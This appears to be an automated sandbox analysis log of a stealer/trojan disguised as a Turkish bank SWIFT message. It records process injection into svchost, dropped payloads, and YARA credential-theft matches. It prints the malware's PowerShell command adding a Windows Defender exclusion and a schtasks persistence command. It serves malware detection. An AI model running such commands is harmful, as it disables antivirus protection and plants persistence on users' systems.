                          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.244.188.177 80
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.141.10.107 80
                          Source: server02.exe.5.dr, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                          Source: server02.exe.5.dr, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                          Source: server02.exe.5.dr, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                          Source: 5.2.svchost.exe.6f05570.4.raw.unpack, Ljq6xD21ACX.csReference to suspicious API methods: OZkujShDCVG.OpenProcess(aPNZ30.DuplicateHandle, bInheritHandle: true, (uint)snUp2.ProcessID)
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 9F1008Jump to behavior
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2F1C008
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000BB106 LogonUserW,0_2_000BB106
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_00083D98 GetFullPathNameW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00083D98
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000C411C SendInput,keybd_event,0_2_000C411C
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000C74BB mouse_event,0_2_000C74BB
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe"Jump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\TrojanAI.exe "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe" Jump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\server02.exe "C:\Users\user~1\AppData\Local\Temp\server02.exe" Jump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user~1\AppData\Local\Temp\neworigin.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:31 /du 23:59 /sc daily /ri 1 /fJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpA3B8.tmp.cmd""Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\bothsided\spadixes.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
                          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\TrojanAI.exe "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe"
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000BA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_000BA66C
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000C71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_000C71FA
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, spadixes.exeBinary or memory string: Shell_TrayWnd
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, spadixes.exe.0.dr, Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.34.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_00A320E1 cpuid 13_2_00A320E1
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,5_2_00417A20
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,34_2_00417A20
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TrojanAI.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeQueries volume information: C:\Users\user\AppData\Local\Temp\server02.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeQueries volume information: C:\Users\user\AppData\Local\Temp\TrojanAI.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000A344A GetSystemTimeAsFileTime,__aulldiv,0_2_000A344A
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_04BA8550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,FreeSid,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,5_2_04BA8550
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000B1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_000B1E8E
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_0009DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0009DDC0
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 5.2.svchost.exe.6f05570.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.6f42790.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.6f42790.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 13.0.neworigin.exe.2f0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.6f05570.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000D.00000002.3714279992.0000000002661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000000.1294374756.00000000002F2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5088, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 520, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
                          Source: Yara matchFile source: 12.0.server02.exe.530000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.73bfdf0.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.73873c0.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.73f8810.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5088, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: server02.exe PID: 6012, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7848, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPED
                          Source: Yara matchFile source: 5.2.svchost.exe.5800f16.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.8640000.8.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.8400000.11.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.7206478.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.3.svchost.exe.8200000.17.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.5800f16.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.6fa8b90.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.8400f08.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8440000.42.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.5e00f16.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.8b00000.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.7206478.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.7205570.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.5e00f16.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.6f05570.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8600f08.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8440000.13.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.8b00f08.9.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.8260000.9.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.8260000.9.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.6f42790.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.8640000.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.3.svchost.exe.8200f08.18.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.3.svchost.exe.8200000.17.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.3.svchost.exe.8600000.0.unpack, type: UNPACKEDPE
